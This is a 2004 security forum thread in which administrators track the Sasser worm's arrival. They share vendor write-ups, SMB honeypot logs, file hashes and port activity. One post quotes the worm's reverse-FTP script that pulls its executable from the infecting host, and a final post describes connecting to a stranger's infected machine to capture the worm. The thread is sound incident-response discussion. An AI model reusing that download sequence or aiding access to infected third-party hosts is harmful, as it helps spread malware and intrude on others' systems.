Schouw
Premium
join:2003-05-29
Netherlands
| Man your battlestations - lsass.exe worm arrived..
I will keep it short..(it's frickin hectic right now)
Please look at »www.f-secure.com/v-descs/sasser.shtml
and »www.f-secure.com/weblog/
As predicted.. |
|
etoast66
join:2001-06-05
Caldwell, NJ | Re: Man your battlestations - lsass.exe worm arriv
We've been seeing this since about midnight. It's going to be a busy day. »vil.nai.com/vil/content/v_125007.htm |
|
Tablet
Premium
join:2003-01-15
Czech
1 edit | reply to Schouw
No signs of this worm on our provider's internal network.. It's only a matter of time before someone connects in with an infected notebook 
Symantec write-up: »securityresponse.symantec.com/av···orm.html |
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH
| Now that a lot of broadband ISPs are blocking port 445 (including mine), I have a feeling this one won't affect home users as much as Blaster did.
Oh well, I guess I miss out on the fun this time around, at least until some ID-10-T manages to bring an infection onto the WAN at work.
--
Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend. |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| said by kpatz  :
Now that a lot of broadband ISPs are blocking port 445 (including mine), I have a feeling this one won't affect home users as much as Blaster did.
I hope you're right -- and a lot of the blocking was because of Blaster and its immediate aftermath...although there are also lots of ISPs that aren't filtering Windows file sharing and MSRPC. Symantec is still only rating it a 2.
Anyway, I'm pulling logs from a system that is exposed. I took a peek and as would seem natural, this exploit targets the \lsarpc named pipe. I was actually surprised to not see much in the way of scans prior to the worm's release, but I believe there were a few during this last week.
It also appears that most of the recent exploits on the Windows file sharing ports (MS03-049 comes to mind) base their exploit code on several assumptions about the CIFS servers, but one in particular stands out watching the incoming traffc -- namely that connecting to named pipes will always return a "tree ID" of 2048. (I'm not making that assumption, so those sessions all fail.)
I'll post a couple of logs excerpts in a bit...
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
TheJoker
Premium,VIP,MVM
join:2001-04-26
Alexandria, VA | reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
News of the worm has now even hit cnet at »news.com.com/2100-7349_3-5203764···nefd.top
--
TheJoker |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to Schouw
Re: Man your battlestations - lsass.exe worm arriv
OK, to illustrate the pre-worm scanning, here's the first entry in my log. This log period began on 13 April; the entry is from 28 April (Wednesday) GMT:
04/28/04 21:32:48 GMT: connection to 66.185.XXX.XXX:445 from 82.224.52.184:1662
04/28/04 21:33:04 GMT: client disconnected
04/28/04 21:33:04 GMT: SMB session ended
04/28/04 21:32:49 GMT: connection to 66.185.XXX.XXX:445 from 82.224.52.184:1672
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2002 2600 Service Pack 1', LM: 'Windows 2002 5 .1', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2002 2600 Service Pack 1', LM: 'Windows 2002 5 .1', Dom: ''
User: '', Domain: '', WKS: 'KENSHINS'
SMB_COM_TREE_CONNECT_ANDX: '\\66.185.XXX.XXX\IPC$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0001
SMB_COM_NT_CREATE_ANDX error: object name not found
04/28/04 21:33:04 GMT: client disconnected
04/28/04 21:33:04 GMT: SMB session ended
The first worm session appears to be right after midnight GMT, and it appears to do a test connection and then try the exploit twice:
05/01/04 00:12:01 GMT: connection to 66.185.XXX.XXX:445 from 217.234.47.81:1188
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
User: '', Domain: '', WKS: 'HOD'
05/01/04 00:12:03 GMT: client disconnected
05/01/04 00:12:03 GMT: SMB session ended
05/01/04 00:12:03 GMT: connection to 66.185.XXX.XXX:445 from 217.234.47.81:1257
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
User: '', Domain: '', WKS: 'HOD'
SMB_COM_TREE_CONNECT_ANDX: '\\66.185.XXX.XXX\ipc$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0800
Invalid TreeID = 2048
05/01/04 00:12:05 GMT: SMB session ended
05/01/04 00:12:06 GMT: connection to 66.185.XXX.XXX:445 from 217.234.47.81:1272
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
User: '', Domain: '', WKS: 'HOD'
SMB_COM_TREE_CONNECT_ANDX: '\\66.185.XXX.XXX\ipc$'
SMB_COM_NT_CREATE_ANDX: '\lsarpc' in TID = 0800
Invalid TreeID = 2048
05/01/04 00:12:07 GMT: SMB session ended
The thing about the TreeID I mentioned before is that these sessions all establish a connection to the IPC$ share. When that occurs, the server gives the client a "key" to refer to that connection -- the TreeID. As with a lot of exploit code, it takes the shortcut of sending "canned" packets, so instead of using the TreeID my server gives back to it, the worm just sends a precompiled packet with a hard-coded TreeID.
This works just fine, though, because there's apparently a convention to always give the IPC$ share connection a hard-coded TreeID. Since the packets for this exploit are precompiled, all the sessions look like this -- unnamed Windows 2000 client in a workgroup named "HOD".
Anyway, the number of these sessions is high; I can't tell whether it's increasing yet, but I suspect so.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
Schouw
Premium
join:2003-05-29
Netherlands | reply to Schouw
Worm.Win32.Sasser.b is ITW.. |
|
etoast66
join:2001-06-05
Caldwell, NJ
| Re: Sasser.b?
said by Schouw :
Worm.Win32.Sasser.b is ITW..
Do you have documentation or a link? |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to Schouw
Re: Man your battlestations - lsass.exe worm arriv
Here's a graph of the tcp/445 and tcp/9996 activity in the last couple of days...you can see that beginning today the numbers for the ports track together for the most part.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
Schouw
Premium
join:2003-05-29
Netherlands
| reply to etoast66
Re: Sasser.b?
said by etoast66 :
said by Schouw :
Worm.Win32.Sasser.b is ITW..
Do you have documentation or a link?
Nothing more currently than entry in KAV's database. |
|
EGeezer
Go Bobcats
Premium
join:2002-08-04
Country! | reply to Schouw
Re: Man your battlestations - lsass.exe worm arriv
Don't know why this topic didn't show in search... So, posting link here for topic search purposes.
»lsass sasser at yellow per Trend Micro |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to Schouw
I got a copy of the worm pretty much as soon as I opened up tcp/9996 on a pseudo-rshell program. Oddly, the KAV online scanner doesn't detect it yet, but it triggered NAV with updated signatures.
The worm uses what is now a common reverse FTP -- from the infectee back to the infector -- via an echoed script file fed into the FTP command line client (ftp.exe); the guts of the commands are:
open (infector IP) 5554
anonymous
bin
get (executable file)
bye
Another interesting thing is that I have two separate EXEs: a single one with an MD5 of "A73C16CCD0B9C4F20BC7842EDD90FC20" and then all the others (so far) have an MD5 of "1A2C0E6130850F8FD9B9B5309413CD00"
And still here at home, absolutely nothing, thanks to Road Runner blocking tcp/445.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
 ·Shaw
| reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
Nothing here yet, as Thursday night has been our highlight thus far. No traffic on 9996 or 5554 either. I will do some quick tests to see if my ISP is filtering, but they rarely if ever filter anything.
Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
1 edit | Re: Man your battlestations - lsass.exe worm arriv
said by Link Logger :
Nothing here yet, as Thursday night has been our highlight thus far. No traffic on 9996 or 5554 either. I will do some quick tests to see if my ISP is filtering, but they rarely if ever filter anything.
Hmm...that's sort of strange, although it seems to be picking up and then it'll be whenever we hit the ceiling of potential victims.
I missed this last night, too, but I'll still take the Stereolab concert over waiting for packets. 
Just to be explicit, the traffic on tcp/5554 is outbound and the content is FTP (command). Didn't check to see if the data is normal or passive FTP, but likely the former.
Edit, correction: Duh -- tcp/5554 is outbound for initial infection, but once infected, there's lots of inbound activity on that port.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org
|
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to Schouw
Microsoft advisory for home users
"What You Should Know About the Sasser Worm" (nice copy/paste error on the HTML page title)
»www.microsoft.com/security/incid···sser.asp
--
Feedback? e-mail: stuff@lupwa.org |
|
Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
·Shaw
| reply to psloss
Re: Man your battlestations - lsass.exe worm arriv
Ran some scans to ensure that my ISP isn't filtering on 9996 or 5554 so if its out there then I should be seeing it, however isn't to say that they didn't code a feature (some would call it a bug) such that it avoids my netblock like Iraq Oil did.
Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel |
|
breckett
join:2003-08-05 | reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
@psloss: how did you simulate a rshell? With which software? |
|
psloss
Premium
join:2002-02-24
Alpharetta, GA
| reply to Link Logger
Re: Man your battlestations - lsass.exe worm arriv
said by Link Logger :
Ran some scans to ensure that my ISP isn't filtering on 9996 or 5554 so if its out there then I should be seeing it, however isn't to say that they didn't code a feature (some would call it a bug) such that it avoids my netblock like Iraq Oil did.
Blake
Hmm...I guess it's possible, given that F-Secure says it's built with Visual C++, that your netblock is in the hole in the run-time library random number generator...that's assuming the propagation works that way.
It will be interesting to see how good the worm implementation was...if it's like Blaster, then many otherwise vulnerable systems will be spared, but only from this malware. I'll bet lots of the systems infected with this are already operating in Agobot/Phatbot botnets.
The trigger appears to be a tcp/445 connection -- I still haven't seen any activity on the rshell port (9996) here at home because 445 is blocked.
Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org |
|
breckett
join:2003-08-05
| reply to Schouw
Re: Man your battlestations - lsass.exe worm arrived..
I'm trying to catch this virus manually (because I've a firewall). I've an IP of an infected machine. I've connected on this machine on 5554 TCP port and I've seen the ftp server. Now How could I simulate a shell on the 9996 TCP port? and the name of the infected file is avserve.exe? |
|
